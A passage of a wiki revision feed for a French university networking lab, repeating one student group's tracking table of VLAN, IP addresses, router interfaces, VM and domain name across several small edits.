! Groupe !! VLAN !!  Réseau IPv4 !! Réseau IPv6 !! @IPv4 virtuelle !! IPv4/IPv6 6509E (E304) !! IPv4/IPv6 C9200 (E306) !! IPv4/IPv6 ISR4331 !!SSID !! VM !! @IPv4 MV non routée !! @IPv4 MV  routée !! Nom de domaine !&lt;br /&gt;
|-&lt;br /&gt;
| Antonin / Hugo || 20 || 10.20.0.0/16 || - || 10.20.0.250 || 10.20.0.251 || 10.20.0.252 || 10.20.0.253 || - || HG || 172.26.145.76/24 || 193.48.57.163/28 || detestable.site&lt;br /&gt;
|}&lt;/div&gt;</summary>
		<author><name>Amace</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_SE2a5_2022/2023_G1&amp;diff=59660</id>
		<title>TP sysres SE2a5 2022/2023 G1</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_SE2a5_2022/2023_G1&amp;diff=59660"/>
				<updated>2022-11-10T10:32:57Z</updated>
		
		<summary type="html">&lt;p&gt;Amace : /* Cahier de suivi - Groupe 1 */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;br /&gt;
== Cahier de suivi - Groupe 1 ==&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Groupe !! VLAN !!  Réseau IPv4 !! Réseau IPv6 !! @IPv4 virtuelle !! IPv4/IPv6 6509E (E304) !! IPv4/IPv6 C9200 (E306) !! IPv4/IPv6 ISR4331 !!SSID !! VM !! @IPv4 MV non routée !! @IPv4 MV  routée !! Nom de domaine !&lt;br /&gt;
|-&lt;br /&gt;
| Antonin / Hugo || 20 || 10.20.0.0/16 || - || 10.20.0.250 || 10.20.0.251 || 10.20.0.252 || 10.20.0.253 || - || HG || 172.26.145.76/24 || 193.48.57.163/28 || detestable.site&lt;br /&gt;
|}&lt;/div&gt;</summary>
		<author><name>Amace</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_SE2a5_2022/2023_G1&amp;diff=59659</id>
		<title>TP sysres SE2a5 2022/2023 G1</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_SE2a5_2022/2023_G1&amp;diff=59659"/>
				<updated>2022-11-10T10:32:33Z</updated>
		
		<summary type="html">&lt;p&gt;Amace : /* Cahier de suivi - Groupe 1 */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;br /&gt;
== Cahier de suivi - Groupe 1 ==&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Groupe !! VLAN !!  Réseau IPv4 !! Réseau IPv6 !! @IPv4 virtuelle !! IPv4/IPv6 6509E (E304) !! IPv4/IPv6 C9200 (E306) !! IPv4/IPv6 ISR4331 !!SSID !! VM ! @IPv4 MV non routée !! @IPv4 MV  routée !! Nom de domaine&lt;br /&gt;
|-&lt;br /&gt;
| Antonin / Hugo || 20 || 10.20.0.0/16 || - || 10.20.0.250 || 10.20.0.251 || 10.20.0.252 || 10.20.0.253 || - || HG || 172.26.145.76/24 || 193.48.57.163/28 || detestable.site&lt;br /&gt;
|}&lt;/div&gt;</summary>
		<author><name>Amace</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_SE2a5_2022/2023_G1&amp;diff=59657</id>
		<title>TP sysres SE2a5 2022/2023 G1</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_SE2a5_2022/2023_G1&amp;diff=59657"/>
				<updated>2022-11-10T10:30:13Z</updated>
		
		<summary type="html">&lt;p&gt;Amace : /* Cahier de suivi - Groupe 1 */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;br /&gt;
== Cahier de suivi - Groupe 1 ==&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Groupe !! VLAN !!  Réseau IPv4 !! Réseau IPv6 !! @IPv4 virtuelle !! IPv4/IPv6 6509E (E304) !! IPv4/IPv6 C9200 (E306) !! IPv4/IPv6 ISR4331 !!SSID !! VM ! @IPv4 MV  routée !! Nom de domaine&lt;br /&gt;
|-&lt;br /&gt;
| Antonin / Hugo || 20 || 10.20.0.0/16 || - || 10.20.0.250 || 10.20.0.251 || 10.20.0.252 || 10.20.0.253 || - || HG || 172.26.145.76/24 || 193.48.57.163/28 || detestable.site&lt;br /&gt;
|}&lt;/div&gt;</summary>
		<author><name>Amace</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_SE2a5_2022/2023_G1&amp;diff=59655</id>
		<title>TP sysres SE2a5 2022/2023 G1</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_SE2a5_2022/2023_G1&amp;diff=59655"/>
				<updated>2022-11-10T10:29:52Z</updated>
		
		<summary type="html">&lt;p&gt;Amace : /* Cahier de suivi - Groupe 1 */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;br /&gt;
== Cahier de suivi - Groupe 1 ==&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Groupe !! VLAN !!  Réseau IPv4 !! Réseau IPv6 !! @IPv4 virtuelle !! IPv4/IPv6 6509E (E304) !! IPv4/IPv6 C9200 (E306) !! IPv4/IPv6 ISR4331 !!SSID !! VM &lt;br /&gt;
|-&lt;br /&gt;
| Antonin / Hugo || 20 || 10.20.0.0/16 || - || 10.20.0.250 || 10.20.0.251 || 10.20.0.252 || 10.20.0.253 || - || HG || 172.26.145.76/24 || 193.48.57.163/28 || detestable.site&lt;br /&gt;
|}&lt;/div&gt;</summary>
		<author><name>Amace</name></author>	</entry>

	</feed>